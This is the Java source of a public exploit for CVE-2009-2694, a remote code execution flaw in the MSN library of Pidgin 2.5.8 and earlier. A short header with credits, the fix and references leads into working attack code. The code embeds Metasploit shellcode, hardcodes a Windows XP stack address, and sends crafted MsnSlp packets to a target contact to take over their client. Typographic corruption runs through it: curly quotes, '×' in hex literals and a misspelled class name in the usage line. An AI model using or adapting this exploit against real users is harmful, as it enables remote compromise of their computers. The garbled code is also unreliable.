Pidgin MSN <= 2.5.8 Remote Code Execution

/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
* Pidgin is a multi-protocol Instant Messenger.
*
* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
* The library “libmsn” used by pidgin doesn’t handle specially crafted MsnSlp packets
* which could lead to memory corruption.
*
* Affected versions :
* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
* Windows, Linux, Mac
*
* Fix :
* Fixed in Pidgin 2.5.9
* Update to the latest version : http://www.pidgin.im/download/
*
* References :
* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
* [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
* javac.exe -cp “%classpath%;.\jml-1.0b3-full.jar” PidginExploit.java
* java -cp “%classpath%;.\jml-1.0b3-full.jar” PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

private MsnMessenger messenger;
private String login;
private String password;
private String target;

private int session_id = NumberUtils.getIntRandom();

private byte shellcode[] = new byte[] {

/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0×81, (byte) 0xEC, (byte) 0×00, (byte) 0×05, (byte) 0×00, (byte) 0×00,

/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0×44, (byte) 0×00, (byte) 0×00, (byte) 0×00, (byte) 0×8b, (byte) 0×45,
(byte) 0×3c, (byte) 0×8b, (byte) 0×7c, (byte) 0×05, (byte) 0×78, (byte) 0×01, (byte) 0xef, (byte) 0×8b,
(byte) 0×4f, (byte) 0×18, (byte) 0×8b, (byte) 0×5f, (byte) 0×20, (byte) 0×01, (byte) 0xeb, (byte) 0×49,
(byte) 0×8b, (byte) 0×34, (byte) 0×8b, (byte) 0×01, (byte) 0xee, (byte) 0×31, (byte) 0xc0, (byte) 0×99,
(byte) 0xac, (byte) 0×84, (byte) 0xc0, (byte) 0×74, (byte) 0×07, (byte) 0xc1, (byte) 0xca, (byte) 0×0d,
(byte) 0×01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0×3b, (byte) 0×54, (byte) 0×24, (byte) 0×04,
(byte) 0×75, (byte) 0xe5, (byte) 0×8b, (byte) 0×5f, (byte) 0×24, (byte) 0×01, (byte) 0xeb, (byte) 0×66,
(byte) 0×8b, (byte) 0×0c, (byte) 0×4b, (byte) 0×8b, (byte) 0×5f, (byte) 0×1c, (byte) 0×01, (byte) 0xeb,
(byte) 0×8b, (byte) 0×1c, (byte) 0×8b, (byte) 0×01, (byte) 0xeb, (byte) 0×89, (byte) 0×5c, (byte) 0×24,
(byte) 0×04, (byte) 0xc3, (byte) 0×5f, (byte) 0×31, (byte) 0xf6, (byte) 0×60, (byte) 0×56, (byte) 0×64,
(byte) 0×8b, (byte) 0×46, (byte) 0×30, (byte) 0×8b, (byte) 0×40, (byte) 0×0c, (byte) 0×8b, (byte) 0×70,
(byte) 0×1c, (byte) 0xad, (byte) 0×8b, (byte) 0×68, (byte) 0×08, (byte) 0×89, (byte) 0xf8, (byte) 0×83,
(byte) 0xc0, (byte) 0×6a, (byte) 0×50, (byte) 0×68, (byte) 0×7e, (byte) 0xd8, (byte) 0xe2, (byte) 0×73,
(byte) 0×68, (byte) 0×98, (byte) 0xfe, (byte) 0×8a, (byte) 0×0e, (byte) 0×57, (byte) 0xff, (byte) 0xe7,
(byte) 0×63, (byte) 0×61, (byte) 0×6c, (byte) 0×63, (byte) 0×2e, (byte) 0×65, (byte) 0×78, (byte) 0×65,
(byte) 0×00
};

// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It’s magic !
private int reteip = 0×0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8

private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;

public static void main(String[] args) throws Exception {

if(args.length != 3){
System.out.println(”PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL”);
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}

}

public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;

neweip = reteip - shellcode.length ;

for(int i=0;i<shellcode.length;i++)
payload[i] = shellcode[i];

payload[shellcode.length] = (byte)(neweip & 0×000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0×0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0×00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}

public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);

initMessenger(messenger);
messenger.login();
}

protected void initMessenger(MsnMessenger messenger) {

messenger.addContactListListener(new MsnContactListAdapter() {

public void contactListInitCompleted(MsnMessenger messenger) {

final Object id = new Object();

messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

public void switchboardStarted(MsnSwitchboard switchboard) {

if (id != switchboard.getAttachment())
return;

switchboard.inviteContact(Email.parseStr(target));
}

public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;

MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);

// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We’ll use this buffer to rewrite memory in the stack
msg.setFlag(0×1000020);

msg.setP2PDest(target);

switchboard.sendMessage(msg);

System.out.println(”First packet sent, waiting for the ACK”);

}

public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println(”switchboardClosed”);
switchboard.getMessenger().removeSwitchboardListener(this);
}

public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println(”contactLeaveSwitchboard”);
}
});
messenger.newSwitchboard(id);
}
});

messenger.addMessageListener(new MsnMessageAdapter(){

public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();

MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);

switchboard.sendMessage(msg);
System.out.println(”ACK received && Payload sent !”);
System.out.println(”Exploit OK ! CTRL+C to quit”);

}
});

messenger.addMessengerListener(new MsnMessengerAdapter() {

public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + ” login”);
}

public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + ” logout”);
}

public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println(”caught exception: ” + throwable);
}
});

}
}